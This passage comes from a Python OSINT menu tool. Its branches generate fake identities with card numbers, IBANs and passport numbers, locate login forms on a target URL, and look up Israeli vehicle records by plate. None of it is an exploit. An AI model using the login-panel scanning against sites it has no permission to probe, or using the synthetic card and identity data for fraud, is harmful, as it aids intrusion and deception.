"ta_IN", "th", "th_TH", "tl_PH", "tr_TR", 1944 | "tw_GH", "uk_UA", "vi_VN", "yo_NG", "zh_CN", "zh_TW", "zh_ZA"] 1945 | 1946 | if choose in lang_and_country_list: 1947 | print(f"{White}Creating...") 1948 | time.sleep(3) 1949 | print(f"[ Create for {Blue}{choose} {Green}✓{White} ]") 1950 | time.sleep(1) 1951 | 1952 | fake = faker.Faker(choose) 1953 | 1954 | import datetime 1955 | 1956 | dt = datetime.datetime.now() 1957 | 1958 | fake_age = fake.random_int(min=18, max=60) 1959 | birth_year = dt.year - fake_age 1960 | 1961 | social_status = ["Student", "Graduate", "Employee", "Unemployed", "Single", "Engaged", "Married"] 1962 | social_status_choice = random.choice(social_status) 1963 | phones = [ 1964 | "Honor V30", "Honor 30 Pro", "Honor 8A Prime", "Honor Play 9A", "Honor 30S", "Honor Play 4T", "Honor Play Pro", 1965 | "Honor 8A 2020", "Honor 20e", "Honor 30", "Honor Pro+", "Honor 9X Lite", "Honor 9C", "Honor 9S", "Honor 9A", 1966 | "Honor X10", "Honor Play 4", "Honor Play 4 Pro", "Honor 30 Lite", "Honor X10", "Honor 30i", "Honor 10X Lite", 1967 | "Honor V40", "Honor V40 Lite", "Honor Play 5T Youth", "Honor Play 20", "Honor Play 5", "Honor 60", "Honor 50 Pro", 1968 | "Honor 50 SE", "Honor X20 SE", "Honor Play 5T Pro", "Honor Magic3" , "Honor Magic3 Pro", "Honor Magic3 Pro+", 1969 | "Honor X20", "Honor 50 Lite", "Honor X30 MAX", "Honor X30i", "Honor 60", "Honor 60 Pro", "Honor Play 30 Plus", 1970 | "Huawei Mate 30", "Huawei Nova" "Huawei Nova 6", "Huawei Nova 5G", "Huawei Nova SE", "Huawei P40 Lite", 1971 | "Huawei P40", "Huawei Nova" "Huawei Nova 7", "Huawei Nova 7 Pro", "Huawei Nova 7 SE", "Huawei P40 Lite 5G", 1972 | "Huawei Nova 7 SE 5G Youth", "Huawei Mate 40", "Huawei Nova 8 SE", "Huawei Nova 8 5G", "Huawei Nova 8 Pro", 1973 | "Huawei Mate X2", "Huawei Nova 8 Pro 4G", "Huawei Nova 8i", "Huawei Nova 8 SE Youth", "Huawei P50", 1974 | "Huawei P50 Pro", "Huawei Enjoy 20e", "Huawei Nova 9", "Huawei Nova Y60", "Huawei P50 Pocket", "Huawei Nova 9 SE", 1975 | "Huawei Nova 9 SE 5G", "Huawei Nova Y70", "Huawei Nova Y70 Plus", "Huawei Nova Y90", "Huawei Mate Xs 2", 1976 | "Huawei Nova 10", "Huawei Mate 50", "Huawei Mate 50 Pro", "Huawei Mate 50 RS", "Huawei Mate 10 SE", 1977 | "Huawei Mate Y61", "Samsung Galaxy A51", "Samsung Galaxy A71," "Samsung Galaxy A01", "Samsung Galaxy Xcover Pro", 1978 | "Samsung Galaxy Z Flip", "Samsung Galaxy S20", "Samsung Galaxy S20+", "Samsung Galaxy S20 Ultra", 1979 | "Samsung Galaxy A31", "Samsung Galaxy A11", "Samsung Galaxy A41", "Samsung Galaxy A51", "Samsung Galaxy A51 5G", 1980 | "Samsung Galaxy A71 5G", "Samsung Galaxy A21", "Samsung Galaxy A21s", "Samsung Galaxy A21 5G UW", 1981 | "Samsung Galaxy Z Flip 5G", "Samsung Galaxy Note 20", "Samsung Galaxy Note 20 Ultra", "Samsung Galaxy Z Fold 2", 1982 | "Samsung Galaxy A01 Core", "Samsung Galaxy A51 5G UW", "Samsung Galaxy A42 5G", "Samsung Galaxy S20 FE", 1983 | "Samsung Galaxy F41", "Samsung Galaxy M21s", "Samsung Galaxy A12", "Samsung Galaxy A02s", 1984 | "Samsung Galaxy A32 5G", "Samsung Galaxy S21", "Samsung Galaxy S21+", "Samsung Galaxy S21 Ultra", 1985 | "Samsung Galaxy A02", "Samsung Galaxy M02", "Samsung Galaxy M12", "Samsung Galaxy F62", "Samsung Galaxy M62", 1986 | "Samsung Galaxy A32", "Samsung Galaxy Xcover 5", "Samsung Galaxy A52/A52 5G", "Samsung Galaxy A72", 1987 | "Samsung Galaxy F02s", "Samsung Galaxy F12", "Samsung Galaxy Quantum 2", "Samsung Galaxy F52 5G", 1988 | "Samsung Galaxy M32", "Samsung Galaxy A22", "Samsung Galaxy A22 5G", "Samsung Galaxy Z Fold 3", 1989 | "Samsung Galaxy Z Flip 3", "Samsung Galaxy M52 5G", "iPhone 6", "iPhone 6s", "iPhone 6 Plus", "iPhone 6s Plus", 1990 | "iPhone 7", "iPhone 7 Plus", "iPhone 8", "iPhone 8 Plus", "iPhone X", "iPhone XR", "iPhone XS", "iPhone XS Max", 1991 | "iPhone SE", "iPhone 12", "iPhone 12 Mini", "iPhone 12 Pro", "iPhone 12 Pro Max", "iPhone 13", "iPhone 13 Mini", 1992 | "iPhone 13 Pro", "iPhone 13 Pro Max", "iPhone 14", "iPhone 14 Plus", "iPhone 14 Pro", "iPhone 14 Pro Max", 1993 | "iPhone 15", "iPhone 15 Plus", "iPhone 15 Pro", "iPhone 15 Pro Max"] 1994 | cars = [ 1995 | "Toyota Yaris Sedan 2013", "Toyota Yaris Sedan 2024 Y", "Toyota Yaris Sedan 2024 Y Plus"," Toyota Yaris Sedan 2024 YX", 1996 | "Toyota Yaris Sedan 2014 Fleet", "Toyota Yaris Sedan 2017 manual STD", "Toyota Yaris Sedan 2017 Y FLT", 1997 | "Toyota Yaris Sedan 2017 Limited", "Toyota Yaris Sedan 2019 Y MT", "Toyota Yaris Sedan 2019 Y", 1998 | "Toyota Yaris Sedan 2019 YX", "Kia Rio 2014", "Hyundai Accent 2022 Smart", "Toyota Corolla 2024 XLI", 1999 | "Chevrolet Cruze 2014 LT", "Honda Civic 2022 Sport", "MG GT 2024 Comfort", "Honda City 2024 Sport", "Nissan Sunny 2017", 2000 | "Kia Rio 2023 EX", "Honda City 2003", "Hyundai Accent 2023 Smart Plus", "Ford Fiesta 2017", "Peugeot 207 2012 RC hatchback", 2001 | "Bentley Continental GT 2015", "Aston Martin DB9 2017", "Bentley Continental GT 2024", "Mercedes-Benz S-Class Coupe 2022", 2002 | "Ferrari GTC4Lusso 2017", "Maserati GranTurismo 2020", "BMW M5 2024 Competition", "Audi RS 6 2024", "BMW M5 2024", 2003 | "Porsche Taycan Turbo 2021", "GMC Sierra 2024 Elevetion", "GMC Sierra 2022 AT4", "Lexus LX 2011", "Lexus LS 2023", 2004 | "Mazda CX-3 2022 GS", "Mazda CX-3 2022 GTX", "Mazda CX-3 2022 GTL", "Mazda CX-3 2022 GT", "Mazda MX-5 2024", 2005 | "Ford Crown Victoria 2011", "Ford Crown Victoria 2009", "Chevrolet Caprice 2016 Royale", "Ford Taurus 2017 SHO", 2006 | "Chevrolet Impala 2019 LT", "Dodge Charger 2023 R/T Scatpack", "Toyota Avalon 2022 Limited", "Chevrolet Impala 2014 LS", 2007 | "Volkswagen Tiguan 2024 R-Line", "Honda CR-V 2023 DX", "Tesla Model X 2024", "Rolls Royce Ghost 2022", "Jaguar XJ 2020 TC", 2008 | "BMW 7-Series 2022 750Li", "Lexus LS 2023", "Mercedes-Benz S-Class 2024 S500", "Mercedes-Benz S-Class 2024 S450", 2009 | "Audi A8 2024 60 TFSI Quattro LWB", "Geely Preface 2025 GL", "Geely Preface 2025 GF", "MG 7 2024 STD", 2010 | "Hyundai Elantra 2024", "Ford Escort 2020", "Ford Escort 2021", "Dodge Viper 2017 SRT Viper GTS", 2011 | "Porsche 911 2024 Carrera 4 GTS", "Suzuki Carry 2013", "Nissan Patrol 2024 XE", "GMC Yukon 2007", 2012 | "Ford Expedition 2022 Limited", "Chevrolet Tahoe 2016 LTZ", "Hyundai Azera 2013", "Hyundai Azera 2024 Base", 2013 | "Chrysler 300C 2024", "Toyota Crown 2023", "Ford Taurus 2012", "Hyundai Elantra 2024", "BMW M4 2024 Competition", 2014 | "Toyota Camry 2003", "Chevrolet Malebu 2020 LS", "Chevrolet Malebu 2021 LS", "ALFA ROMEO 4C 2013", "Kia Cerato 2012", 2015 | "BMW 4-Series 2024 430i", "BMW 4-Series 2024 440i", "Hyundai Accent 2011", "Hyundai Accent 2021 Comfort"] 2016 | foods = [ 2017 | "Pasta", "Hamburger", "Shawarma", "Rice", "Potatoes", "Plants", "Sausage", "Noodles", "Kebab", "Popular Food", "Donuts", 2018 | "Eggs", "Spinach", "Pizza", "Pancakes", "None"] 2019 | 2020 | print(f""" 2021 | {White}[{Blue}-{White}] Name : {fake.name()} 2022 | {White}[{Blue}-{White}] Age : {fake_age} 2023 | {White}[{Blue}-{White}] Date Of Birth : {birth_year}/{fake.month()}/{fake.day_of_month()} {fake.time()}{dt.strftime("%p")} 2024 | {White}[{Blue}-{White}] Address : {fake.address()} 2025 | {White}[{Blue}-{White}] Phone No. : {fake.phone_number()} 2026 | {White}[{Blue}-{White}] Email : {fake.email()} 2027 | {White}[{Blue}-{White}] Phone : {random.choice(phones)} 2028 | {White}[{Blue}-{White}] Social Status : {random.choice(social_status_choice)} 2029 | {White}[{Blue}-{White}] Job : {fake.job() if social_status_choice == "Employee" else None} 2030 | {White}[{Blue}-{White}] Company : {fake.company() if social_status_choice == "Employee" else None} 2031 | {White}[{Blue}-{White}] Public IPv4 : {fake.ipv4_public()} 2032 | {White}[{Blue}-{White}] Private IPv4 : {fake.ipv4_private()} 2033 | {White}[{Blue}-{White}] IPv6 : {fake.ipv6()} 2034 | {White}[{Blue}-{White}] Mac Address : {fake.mac_address()} 2035 | {White}[{Blue}-{White}] NIC Card Address : {fake.nic_handle()} 2036 | {White}[{Blue}-{White}] BBAN : {fake.bban()} 2037 | {White}[{Blue}-{White}] IBAN : {fake.iban()} 2038 | {White}[{Blue}-{White}] Credit Card Provider : {fake.credit_card_provider()} 2039 | {White}[{Blue}-{White}] Credit Card No. : {fake.credit_card_number()} 2040 | {White}[{Blue}-{White}] Credit Card Sec Code : {fake.credit_card_security_code()} 2041 | {White}[{Blue}-{White}] Credit Card Expire : {fake.credit_card_expire()} 2042 | {White}[{Blue}-{White}] Swift Code : {fake.swift(length=11, primary=True, use_dataset=True)} 2043 | {White}[{Blue}-{White}] Financial balance : {fake.pricetag()} 2044 | {White}[{Blue}-{White}] Passport No. : {fake.passport_number()} 2045 | {White}[{Blue}-{White}] Passport DOB : {birth_year} 2046 | {White}[{Blue}-{White}] Car : {random.choice(cars)} {fake.color_name()} 2047 | {White}[{Blue}-{White}] Car License Plate : {fake.license_plate()} 2048 | {White}[{Blue}-{White}] Car Body No. : {fake.vin()} 2049 | {White}[{Blue}-{White}] Fav Color : {fake.color_name()} 2050 | {White}[{Blue}-{White}] Fav Food : {random.choice(foods)}""") 2051 | else: print(f"{Red}Please choose a correct option!") 2052 | elif selection == "23" or selection == "Create Hashtags" or selection == "CREATE HASHTAGS" or selection == "create Hashtags": 2053 | keyword = input(f"{White}[{Blue}+{White}] Enter the keyword (ex: hacking) : {Blue}") 2054 | 2055 | url = f"http://hashmeapi-stage.us-west-2.elasticbeanstalk.com/search?q={keyword}" 2056 | r = requests.get(url) 2057 | hashtags = r.json() 2058 | if len(hashtags) > 1: 2059 | for i in range(len(hashtags)): 2060 | print(f"#{hashtags[i]}") 2061 | else: print(f"{White}Try another keyword") 2062 | elif selection == "24" or selection == "Extract Login Panels" or selection == "EXTRACT LOGIN PANELS" or selection == "extract login panels": 2063 | def find_login_panel(url): 2064 | try: 2065 | user_agent = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'} 2066 | response = requests.get(url, headers=user_agent, verify=False, timeout=8, allow_redirects=True) 2067 | soup = BeautifulSoup(response.content, "html.parser") 2068 | forms = soup.find_all("form") 2069 | if forms: 2070 | login_form = forms[0] 2071 | action = login_form.get("action") 2072 | if action and not action.startswith("http"): 2073 | action = url + action 2074 | print(f"\n{White}[{Green}✓{White}] Login Panel Found : {Yellow}{action}") 2075 | else: 2076 | print(f"\n{White}[{Red}X{White}] Not any login panel found") 2077 | except BaseException as msg: print(f"{Red}E: {msg}") 2078 | 2079 | url = input(f"{White}[{Blue}+{White}] Enter the URL target : {Blue}") 2080 | 2081 | print(f"{White}Extracting...") 2082 | time.sleep(3) 2083 | print(f"[ Extract for {Blue}{url} {Green}✓{White} ]") 2084 | time.sleep(1) 2085 | find_login_panel(url) 2086 | elif selection == "25" or selection == "Cars OSINT" or selection == "CARS OSINT" or selection == "cars osint": 2087 | car_country = input(f"""{White}[{Blue}01{White}] Israel [IL] 2088 | {White}[{Blue}+{White}] Enter the country name or countrycode : {Blue}""") 2089 | 2090 | if car_country == "Israel" or car_country == "IL": 2091 | try: 2092 | plate_number = input(f"{White}[{Blue}+{White}] Enter the plate number (ex: 123-45-6 78) : {Blue}") 2093 | print(f"{White}Getting info...") 2094 | time.sleep(3) 2095 | print(f"[ Get Info for {Blue}{plate_number} {Green}✓{White} ]") 2096 | time.sleep(1) 2097 | 2098 | veh_request_json = {"DynamicTemplateID":"af3b0f3e-7b99-4a3f-a9cf-15e02384fe1c","QueryFilters":{"skip":{"Query":"0"},"mispar_rechev":{"Query":plate_number}},"From":"0"} 2099 | 2100 | data = requests.post("https://www.gov.il/he/api/DataGovProxy/GetDGResults", json=veh_request_json) 2101 | 2102 | value = json.loads(data.text) 2103 | car_name = value['Results'][0]['Data']['tozeret_nm'] 2104 | trade_name = value['Results'][0]['Data']['kinuy_mishari'] 2105 | model = value['Results'][0]['Data']['shnat_yitzur'] 2106 | owner = value['Results'][0]['Data']['baalut'] 2107 | car_color = value['Results'][0]['Data']['tzeva_rechev'] 2108 | 2109 | table = Table(title="") 2110 | table.add_column("Info", no_wrap=True) 2111 | table.add_column("Car") 2112 | table.add_row("Car Name", car_name) 2113 | table.add_row("Trade Name", trade_name) 2114 | table.add_row("Model", model) 2115 | table.add_row("Car Color", car_color) 2116 | table.add_row("Current Owner", owner) 2117 | Console().print(table, justify="left") 2118 | except BaseException as msg: print(f"{Red}E: {msg}") 2119 | else: print(f"{Red}Please choose a correct country name or countrycode!") 2120 | elif selection == "97" or selection == "Update" or selection == "UPDATE": 2121 | print(f"{White}Updating...\n") 2122 | 2123 | time.sleep(0.1) 2124 | 2125 | spinner = ["|", "/", "-", "\\"] 2126 | spinner_index = 0 2127 | 2128 | steps = 50 2129 | 2130 | for i in range(steps): 2131 | percent = 100*(i+1)/steps 2132 | bar_length = 50 2133 | filled_length = int(bar_length*percent/100) 2134 | 2135 | bar = "█"*filled_length+"-"*(bar_length-filled_length) 2136 | sys.stdout.write(f"\r{Green}{spinner[spinner_index % len(spinner)]}{White} [{bar}] {percent:.2f}%") 2137 | sys.stdout.flush() 2138 | spinner_index += 1 2139 | time.sleep(0.1) 2140 | 2141 | subprocess.run(["git", "clone", "https://github.com/tlersa/TS-OSINT.git"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) 2142 | print(f"""\n{White}[{Green}✓{White}] Updated successfully 2143 | new version saved in {Blue}{ os.getcwd()}\TS-OSINT{White}""") 2144 | elif selection == "98" or selection == "Report A Bug" or selection == "REPORT A BUG" or selection == "rebort a bug": 2145 | print(f"""{White}Contact me through one of my acc 2146 | all my acc : {Blue}https://tlersa.github.io/tleralshahrani/Index.html#contact""") 2147 | elif selection == "99" or selection == "Help" or selection == "HELP" or selection == "help": 2148 | print(f"""{White}Contact me through one of my acc 2149 | all my acc : {Blue}https://tlersa.github.io/tleralshahrani/Index.html#contact""") 2150 | elif selection == "00" or selection == "Exit" or selection == "EXIT" or selection == "exit": exit(f"{White}") 2151 | else: print(f"{Red}Please choose a correct option!") 2152 | another_operation() 2153 | 2154 | def main(): 2155 | main_menu() 2156 | 2157 | while True: 2158 | user_input = input(f"{White}Choose : {Blue}") 2159 | handle_selection(user_input) 2160 | 2161 | if __name__ == "__main__": main() 2162 | --------------------------------------------------------------------------------